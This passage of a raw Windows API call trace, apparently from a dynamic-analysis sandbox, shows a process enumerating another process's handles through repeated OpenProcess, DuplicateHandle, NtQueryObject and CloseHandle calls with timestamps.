dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.198] CloseHandle (hObject=0x198) returned 1 [0113.198] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.198] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x228, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.198] CloseHandle (hObject=0x198) returned 1 [0113.198] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.198] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.198] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.199] CloseHandle (hObject=0x1b8) returned 1 [0113.199] CloseHandle (hObject=0x198) returned 1 [0113.199] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.199] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x230, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.199] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.200] CloseHandle (hObject=0x1b8) returned 1 [0113.200] CloseHandle (hObject=0x198) returned 1 [0113.200] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.200] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x234, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.200] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.200] CloseHandle (hObject=0x1b8) returned 1 [0113.200] CloseHandle (hObject=0x198) returned 1 [0113.200] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.201] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x238, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.201] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.201] CloseHandle (hObject=0x1b8) returned 1 [0113.201] CloseHandle (hObject=0x198) returned 1 [0113.201] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.201] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x23c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.201] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.201] CloseHandle (hObject=0x1b8) returned 1 [0113.202] CloseHandle (hObject=0x198) returned 1 [0113.202] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.202] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x240, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.202] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.202] CloseHandle (hObject=0x1b8) returned 1 [0113.202] CloseHandle (hObject=0x198) returned 1 [0113.202] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.202] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x244, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.202] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.203] CloseHandle (hObject=0x1b8) returned 1 [0113.203] CloseHandle (hObject=0x198) returned 1 [0113.203] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.203] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x248, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.203] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.203] CloseHandle (hObject=0x1b8) returned 1 [0113.203] CloseHandle (hObject=0x198) returned 1 [0113.203] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.203] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x24c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.204] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.204] CloseHandle (hObject=0x1b8) returned 1 [0113.204] CloseHandle (hObject=0x198) returned 1 [0113.204] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.204] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x250, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.204] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.204] CloseHandle (hObject=0x1b8) returned 1 [0113.204] CloseHandle (hObject=0x198) returned 1 [0113.204] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.205] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x254, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.205] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.205] CloseHandle (hObject=0x1b8) returned 1 [0113.205] CloseHandle (hObject=0x198) returned 1 [0113.205] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.205] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x258, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.205] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.205] CloseHandle (hObject=0x1b8) returned 1 [0113.206] CloseHandle (hObject=0x198) returned 1 [0113.206] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.206] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x25c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.206] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.206] CloseHandle (hObject=0x1b8) returned 1 [0113.206] CloseHandle (hObject=0x198) returned 1 [0113.206] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.206] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x260, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.207] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.207] CloseHandle (hObject=0x1b8) returned 1 [0113.207] CloseHandle (hObject=0x198) returned 1 [0113.207] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.207] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x264, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.207] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.207] CloseHandle (hObject=0x1b8) returned 1 [0113.207] CloseHandle (hObject=0x198) returned 1 [0113.207] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.208] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x268, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.208] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.208] CloseHandle (hObject=0x1b8) returned 1 [0113.208] CloseHandle (hObject=0x198) returned 1 [0113.208] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.208] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x26c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.208] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.209] CloseHandle (hObject=0x1b8) returned 1 [0113.209] CloseHandle (hObject=0x198) returned 1 [0113.209] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.209] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x270, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.209] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.209] CloseHandle (hObject=0x1b8) returned 1 [0113.209] CloseHandle (hObject=0x198) returned 1 [0113.209] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.210] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x274, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.210] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.210] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.210] GetTickCount () returned 0xe86355 [0113.210] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.210] GetTickCount () returned 0xe86355 [0113.210] CloseHandle (hObject=0x1b8) returned 1 [0113.210] GetTickCount () returned 0xe86355 [0113.210] CloseHandle (hObject=0x198) returned 1 [0113.210] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.210] GetTickCount () returned 0xe86355 [0113.211] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x278, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.211] GetTickCount () returned 0xe86355 [0113.211] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.211] GetTickCount () returned 0xe86355 [0113.211] GetTickCount () returned 0xe86355 [0113.211] CloseHandle (hObject=0x1b8) returned 1 [0113.211] GetTickCount () returned 0xe86355 [0113.211] CloseHandle (hObject=0x198) returned 1 [0113.211] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.211] GetTickCount () returned 0xe86355 [0113.211] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x27c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.211] GetTickCount () returned 0xe86355 [0113.211] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.211] GetTickCount () returned 0xe86355 [0113.211] GetTickCount () returned 0xe86355 [0113.212] CloseHandle (hObject=0x1b8) returned 1 [0113.212] GetTickCount () returned 0xe86355 [0113.212] CloseHandle (hObject=0x198) returned 1 [0113.212] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.212] GetTickCount () returned 0xe86355 [0113.212] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x280, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.212] GetTickCount () returned 0xe86355 [0113.212] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.212] GetTickCount () returned 0xe86355 [0113.212] GetTickCount () returned 0xe86355 [0113.212] CloseHandle (hObject=0x1b8) returned 1 [0113.212] GetTickCount () returned 0xe86355 [0113.212] CloseHandle (hObject=0x198) returned 1 [0113.212] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.212] GetTickCount () returned 0xe86355 [0113.213] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x284, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.213] GetTickCount () returned 0xe86355 [0113.213] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.213] GetTickCount () returned 0xe86355 [0113.213] GetTickCount () returned 0xe86355 [0113.213] CloseHandle (hObject=0x1b8) returned 1 [0113.213] GetTickCount () returned 0xe86355 [0113.213] CloseHandle (hObject=0x198) returned 1 [0113.213] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.213] GetTickCount () returned 0xe86355 [0113.213] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x288, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.213] GetTickCount () returned 0xe86355 [0113.213] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.213] GetTickCount () returned 0xe86355 [0113.214] GetTickCount () returned 0xe86355 [0113.214] CloseHandle (hObject=0x1b8) returned 1 [0113.214] GetTickCount () returned 0xe86355 [0113.214] CloseHandle (hObject=0x198) returned 1 [0113.214] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.214] GetTickCount () returned 0xe86355 [0113.214] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x28c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.214] GetTickCount () returned 0xe86355 [0113.214] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.214] GetTickCount () returned 0xe86355 [0113.214] GetTickCount () returned 0xe86355 [0113.214] CloseHandle (hObject=0x1b8) returned 1 [0113.214] GetTickCount () returned 0xe86355 [0113.214] CloseHandle (hObject=0x198) returned 1 [0113.214] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.215] GetTickCount () returned 0xe86355 [0113.215] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x290, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.215] GetTickCount () returned 0xe86355 [0113.215] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.215] GetTickCount () returned 0xe86355 [0113.215] GetTickCount () returned 0xe86355 [0113.215] CloseHandle (hObject=0x1b8) returned 1 [0113.215] GetTickCount () returned 0xe86355 [0113.215] CloseHandle (hObject=0x198) returned 1 [0113.215] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.215] GetTickCount () returned 0xe86355 [0113.215] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x294, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.215] GetTickCount () returned 0xe86355 [0113.215] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.215] GetTickCount () returned 0xe86355 [0113.216] GetTickCount () returned 0xe86355 [0113.216] CloseHandle (hObject=0x1b8) returned 1 [0113.216] GetTickCount () returned 0xe86355 [0113.216] CloseHandle (hObject=0x198) returned 1 [0113.216] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.216] GetTickCount () returned 0xe86355 [0113.216] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x298, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.216] GetTickCount () returned 0xe86355 [0113.216] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.216] GetTickCount () returned 0xe86355 [0113.216] GetTickCount () returned 0xe86355 [0113.216] CloseHandle (hObject=0x1b8) returned 1 [0113.216] GetTickCount () returned 0xe86355 [0113.216] CloseHandle (hObject=0x198) returned 1 [0113.217] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.217] GetTickCount () returned 0xe86355 [0113.217] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x29c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.217] GetTickCount () returned 0xe86355 [0113.217] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.217] GetTickCount () returned 0xe86355 [0113.217] GetTickCount () returned 0xe86355 [0113.217] CloseHandle (hObject=0x1b8) returned 1 [0113.217] GetTickCount () returned 0xe86355 [0113.217] CloseHandle (hObject=0x198) returned 1 [0113.217] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.217] GetTickCount () returned 0xe86355 [0113.217] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.217] GetTickCount () returned 0xe86355 [0113.218] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.218] GetTickCount () returned 0xe86355 [0113.218] GetTickCount () returned 0xe86355 [0113.218] CloseHandle (hObject=0x1b8) returned 1 [0113.218] GetTickCount () returned 0xe86355 [0113.218] CloseHandle (hObject=0x198) returned 1 [0113.218] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.218] GetTickCount () returned 0xe86355 [0113.218] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.218] GetTickCount () returned 0xe86355 [0113.218] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.218] GetTickCount () returned 0xe86355 [0113.218] GetTickCount () returned 0xe86355 [0113.219] CloseHandle (hObject=0x1b8) returned 1 [0113.219] GetTickCount () returned 0xe86355 [0113.219] CloseHandle (hObject=0x198) returned 1 [0113.219] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.219] GetTickCount () returned 0xe86355 [0113.219] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.219] GetTickCount () returned 0xe86355 [0113.219] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.219] GetTickCount () returned 0xe86355 [0113.219] GetTickCount () returned 0xe86355 [0113.219] CloseHandle (hObject=0x1b8) returned 1 [0113.219] GetTickCount () returned 0xe86355 [0113.219] CloseHandle (hObject=0x198) returned 1 [0113.219] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.219] GetTickCount () returned 0xe86355 [0113.220] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.220] GetTickCount () returned 0xe86355 [0113.220] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.220] GetTickCount () returned 0xe86355 [0113.220] GetTickCount () returned 0xe86355 [0113.220] CloseHandle (hObject=0x1b8) returned 1 [0113.220] GetTickCount () returned 0xe86355 [0113.220] CloseHandle (hObject=0x198) returned 1 [0113.220] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.220] GetTickCount () returned 0xe86355 [0113.220] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.220] GetTickCount () returned 0xe86355 [0113.220] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.221] GetTickCount () returned 0xe86355 [0113.221] GetTickCount () returned 0xe86355 [0113.221] CloseHandle (hObject=0x1b8) returned 1 [0113.221] GetTickCount () returned 0xe86355 [0113.221] CloseHandle (hObject=0x198) returned 1 [0113.221] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x200) returned 0x198 [0113.221] GetTickCount () returned 0xe86355 [0113.221] DuplicateHandle 